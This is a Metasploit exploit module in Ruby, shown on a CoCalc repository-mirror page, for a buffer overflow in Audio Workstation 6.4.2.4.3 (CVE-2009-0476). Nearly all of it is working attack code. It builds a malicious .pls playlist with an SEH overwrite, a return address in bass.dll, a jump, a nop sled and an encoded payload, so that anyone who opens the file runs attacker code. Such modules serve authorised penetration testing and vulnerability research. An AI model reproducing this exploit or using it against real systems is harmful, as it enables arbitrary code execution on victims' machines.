Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/audio_wkstn_pls.rb
19513 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.

19
          When opening a malicious pls file with the Audio Workstation,

20
          a remote attacker could overflow a buffer and execute

21
          arbitrary code.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [ 'germaya_x', 'dookie', ],

25
        'References' => [

26
          [ 'CVE', '2009-0476' ],

27
          [ 'OSVDB', '55424' ],

28
          [ 'EDB', '10353' ],

29
        ],

30
        'DefaultOptions' => {

31
          'EXITFUNC' => 'seh',

32
          'DisablePayloadHandler' => true,

33
          'AllowWin32SEH' => true

34
        },

35
        'Payload' => {

36
          'Space' => 4100,

37
          'BadChars' => "\x00",

38
          'StackAdjustment' => -3500,

39
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

40
          'DisableNops' => true,

41
        },

42
        'Platform' => 'win',

43
        'Targets' => [

44
          [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll

45
        ],

46
        'Privileged' => false,

47
        'DisclosureDate' => '2009-12-08',

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),

60
      ]

61
    )

62
  end

63


64
  def exploit

65
    sploit = rand_text_alpha_upper(1308)

66
    sploit << "\xeb\x16\x90\x90"

67
    sploit << [target.ret].pack('V')

68
    sploit << make_nops(32)

69
    sploit << payload.encoded

70
    sploit << rand_text_alpha_upper(4652 - payload.encoded.length)

71


72
    print_status("Creating '#{datastore['FILENAME']}' file ...")

73
    file_create(sploit)

74
  end

75
end

76


77